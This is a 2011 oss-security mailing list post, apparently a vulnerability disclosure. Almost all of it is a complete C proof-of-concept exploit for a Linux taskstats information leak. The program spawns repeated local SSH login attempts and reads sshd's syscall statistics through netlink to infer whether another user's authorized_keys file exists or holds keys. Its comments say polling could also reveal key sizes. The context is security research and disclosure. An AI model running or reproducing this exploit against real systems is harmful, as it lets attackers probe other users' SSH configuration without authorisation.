Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 21 Jun 2011 22:18:08 +0400
From: Vasiliy Kulikov <segoon@...nwall.com>
To: oss-security@...ts.openwall.com
Subject: taskstats authorized_keys presence infoleak PoC

/*
 * This program tries to learn whether ~user/.ssh/authorized_keys exists
 * and is nonempty for any user on local machine.  It uses world-readable
 * taskstats' nature to get somewhat private io statistics information.  If
 * implant taskstats or /proc/<sshd-pid>/io polling into ssh client, it would be
 * possible to learn precise authorized_keys' size (and estimate private
 * key's(s') size).
 * 
 * The specific min_rsyscalls bounds are working on the testing machine with
 * Linux-3.0-rc2 x86_64 and OpenSSH_5.3p1 Debian-3ubuntu6 with
 * UsePrivilegeSeparation=no.  Other systems need their own numbers.
 *
 *	 gcc ssh_stat_authorized_keys.c -o ssh_stat_authorized_keys
 *
 * Based on linux-2.6/Documentation/accounting/getdelays.c
 * 
 * by Vasiliy Kulikov <segoon from openwall on com>, 2011/06/21
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <poll.h>
#include <string.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <signal.h>

#include <linux/genetlink.h>
#include <linux/taskstats.h>
#include <linux/cgroupstats.h>

/*
 * Generic macros for dealing with netlink sockets. Might be duplicated
 * elsewhere. It is recommended that commercial grade applications use
 * libnl or libnetlink and use the interfaces provided by the library
 */
#define GENLMSG_DATA(glh)	((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
#define GENLMSG_PAYLOAD(glh)	(NLMSG_PAYLOAD(glh, 0) - GENL_HDRLEN)
#define NLA_DATA(na)		((void *)((char*)(na) + NLA_HDRLEN))
#define NLA_PAYLOAD(len)	(len - NLA_HDRLEN)

#define err(code, fmt, arg...)			\
	do {					\
		fprintf(stderr, fmt, ##arg);	\
		exit(code);			\
	} while (0)

char name[100];


/* Maximum size of response requested or message sent */
#define MAX_MSG_SIZE	1024
/* Maximum number of cpus expected to be specified in a cpumask */
#define MAX_CPUS	32

struct msgtemplate {
	struct nlmsghdr n;
	struct genlmsghdr g;
	char buf[MAX_MSG_SIZE];
};

char cpumask[100+6*MAX_CPUS] = "0,1";

static void usage(void)
{
	fprintf(stderr, "getdelays [-dilv] [-w logfile] [-r bufsize] "
			"[-m cpumask] [-t tgid] [-p pid]\n");
	fprintf(stderr, "  -d: print delayacct stats\n");
	fprintf(stderr, "  -i: print IO accounting (works only with -p)\n");
	fprintf(stderr, "  -l: listen forever\n");
	fprintf(stderr, "  -v: debug on\n");
	fprintf(stderr, "  -C: container path\n");
}

/*
 * Create a raw netlink socket and bind
 */
static int create_nl_socket(int protocol)
{
	int fd;
	struct sockaddr_nl local;

	fd = socket(AF_NETLINK, SOCK_RAW, protocol);
	if (fd < 0)
		return -1;


	memset(&local, 0, sizeof(local));
	local.nl_family = AF_NETLINK;

	if (bind(fd, (struct sockaddr *) &local, sizeof(local)) < 0)
		goto error;

	return fd;
error:
	close(fd);
	return -1;
}


static int send_cmd(int sd, __u16 nlmsg_type, __u32 nlmsg_pid,
	     __u8 genl_cmd, __u16 nla_type,
	     void *nla_data, int nla_len)
{
	struct nlattr *na;
	struct sockaddr_nl nladdr;
	int r, buflen;
	char *buf;

	struct msgtemplate msg;

	msg.n.nlmsg_len = NLMSG_LENGTH(GENL_HDRLEN);
	msg.n.nlmsg_type = nlmsg_type;
	msg.n.nlmsg_flags = NLM_F_REQUEST;
	msg.n.nlmsg_seq = 0;
	msg.n.nlmsg_pid = nlmsg_pid;
	msg.g.cmd = genl_cmd;
	msg.g.version = 0x1;
	na = (struct nlattr *) GENLMSG_DATA(&msg);
	na->nla_type = nla_type;
	na->nla_len = nla_len + 1 + NLA_HDRLEN;
	memcpy(NLA_DATA(na), nla_data, nla_len);
	msg.n.nlmsg_len += NLMSG_ALIGN(na->nla_len);

	buf = (char *) &msg;
	buflen = msg.n.nlmsg_len ;
	memset(&nladdr, 0, sizeof(nladdr));
	nladdr.nl_family = AF_NETLINK;
	while ((r = sendto(sd, buf, buflen, 0, (struct sockaddr *) &nladdr,
			   sizeof(nladdr))) < buflen) {
		if (r > 0) {
			buf += r;
			buflen -= r;
		} else if (errno != EAGAIN)
			return -1;
	}
	return 0;
}


/*
 * Probe the controller in genetlink to find the family id
 * for the TASKSTATS family
 */
static int get_family_id(int sd)
{
	struct {
		struct nlmsghdr n;
		struct genlmsghdr g;
		char buf[256];
	} ans;

	int id = 0, rc;
	struct nlattr *na;
	int rep_len;

	strcpy(name, TASKSTATS_GENL_NAME);
	rc = send_cmd(sd, GENL_ID_CTRL, getpid(), CTRL_CMD_GETFAMILY,
			CTRL_ATTR_FAMILY_NAME, (void *)name,
			strlen(TASKSTATS_GENL_NAME)+1);
	if (rc < 0)
		return 0;	/* sendto() failure? */

	rep_len = recv(sd, &ans, sizeof(ans), 0);
	if (ans.n.nlmsg_type == NLMSG_ERROR ||
	    (rep_len < 0) || !NLMSG_OK((&ans.n), rep_len))
		return 0;

	na = (struct nlattr *) GENLMSG_DATA(&ans);
	na = (struct nlattr *) ((char *) na + NLA_ALIGN(na->nla_len));
	if (na->nla_type == CTRL_ATTR_FAMILY_ID) {
		id = *(__u16 *) NLA_DATA(na);
	}
	return id;
}

int main(int argc, char *argv[])
{
	int c, rc, rep_len, aggr_len, len2;
	__u16 id;
	__u32 mypid;

	struct nlattr *na;
	int nl_sd = -1;
	int len = 0;

    pid_t cpid;
    char username[128] = "root";
    unsigned long long min_rsyscalls = 100000, max_rsyscalls = 0;

	int count = 0;
	int maskset = 1;
    int max_count = 10;

	struct msgtemplate msg;
    struct taskstats *tst;

	while (1) {
		c = getopt(argc, argv, "u:");
		if (c < 0)
			break;

		switch (c) {
		case 'u':
			strcpy(username, optarg);
			break;
		default:
			usage();
			exit(-1);
		}
	}


	if ((nl_sd = create_nl_socket(NETLINK_GENERIC)) < 0)
		err(1, "error creating Netlink socket\n");


	mypid = getpid();
	id = get_family_id(nl_sd);
	if (!id) {
		fprintf(stderr, "Error getting family id, errno %d\n", errno);
		goto err;
	}

    rc = send_cmd(nl_sd, id, mypid, TASKSTATS_CMD_GET,
              TASKSTATS_CMD_ATTR_REGISTER_CPUMASK,
              &cpumask, strlen(cpumask) + 1);
    if (rc < 0) {
        fprintf(stderr, "error sending register cpumask\n");
        goto err;
    }

    if ((cpid = fork()) == 0) {
        char buffer[128];
        struct timeval tv;
        snprintf(buffer, sizeof(buffer),
             "ssh %s@...alhost -o PasswordAuthentication=no >/dev/null 2>/dev/null; echo -n .", username);

        printf("[*] username: %s\n[*] wait", username);
        fflush(stdout);
        
        while (1) {
            system(buffer);
            if (kill(mypid, 0))
                exit(0);
            
            tv.tv_sec = 0;
            tv.tv_usec = 100000;
            select(0, NULL, NULL, NULL, &tv);
        }
    }


	do {
		rep_len = recv(nl_sd, &msg, sizeof(msg), 0);

		if (rep_len < 0) {
			fprintf(stderr, "nonfatal reply error: errno %d\n",
				errno);
			continue;
		}
		if (msg.n.nlmsg_type == NLMSG_ERROR ||
		    !NLMSG_OK((&msg.n), rep_len)) {
			struct nlmsgerr *err = NLMSG_DATA(&msg);
			fprintf(stderr, "fatal reply error,  errno %d\n",
				err->error);
			goto done;
		}


		rep_len = GENLMSG_PAYLOAD(&msg.n);

		na = (struct nlattr *) GENLMSG_DATA(&msg);
		len = 0;
		while (len < rep_len) {
			len += NLA_ALIGN(na->nla_len);
			switch (na->nla_type) {
			case TASKSTATS_TYPE_AGGR_TGID:
				/* Fall through */
			case TASKSTATS_TYPE_AGGR_PID:
				aggr_len = NLA_PAYLOAD(na->nla_len);
				len2 = 0;
				/* For nested attributes, na follows */
				na = (struct nlattr *) NLA_DATA(na);
				while (len2 < aggr_len) {
					switch (na->nla_type) {
					case TASKSTATS_TYPE_STATS:
                        tst = (struct taskstats *) NLA_DATA(na);
                        if (strcmp(tst->ac_comm, "sshd"))
                            break;
						if (count++ >= max_count)
                            goto done;
                        
                        //printf("rsyscalls: %lu\n", (unsigned long)tst->read_syscalls);
                        if (max_rsyscalls < tst->read_syscalls)
                            max_rsyscalls = tst->read_syscalls;
                        if (min_rsyscalls > tst->read_syscalls)
                            min_rsyscalls = tst->read_syscalls;
						break;
					default:
						//fprintf(stderr, "Unknown nested" " nla_type %d\n", na->nla_type);
						break;
					}
					len2 += NLA_ALIGN(na->nla_len);
					na = (struct nlattr *) ((char *) na + len2);
				}
				break;

			default:
				//fprintf(stderr, "Unknown nla_type %d\n", na->nla_type);
			case TASKSTATS_TYPE_NULL:
				break;
			}
			na = (struct nlattr *) (GENLMSG_DATA(&msg) + len);
		}
	} while (1);
done:

    kill(cpid, SIGKILL);
    sleep(1);
    printf("\n[!] min/max read(): %llu/%llu\n[+] ", min_rsyscalls, max_rsyscalls);

    /*
     * These numbers are system-dependent!
     * Profile your system (e.g. on your own account) if you want it to work.
     */
    if (min_rsyscalls < 197)
        printf("~/%s/.ssh/authorized_keys doesn't exists.\n", username);
    else if (min_rsyscalls < 203)
        printf("~/%s/.ssh/authorized_keys is empty.\n", username);
    else if (min_rsyscalls < 210)
        printf("~/%s/.ssh/authorized_keys is not empty.\n", username);
    else
        printf("~/%s/.ssh/authorized_keys is full of keys!\n", username);

	if (maskset) {
		rc = send_cmd(nl_sd, id, mypid, TASKSTATS_CMD_GET,
			      TASKSTATS_CMD_ATTR_DEREGISTER_CPUMASK,
			      &cpumask, strlen(cpumask) + 1);
		//printf("Sent deregister mask, retval %d\n", rc);
		if (rc < 0)
			err(rc, "error sending deregister cpumask\n");
	}
err:
	close(nl_sd);
	return 0;
}

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ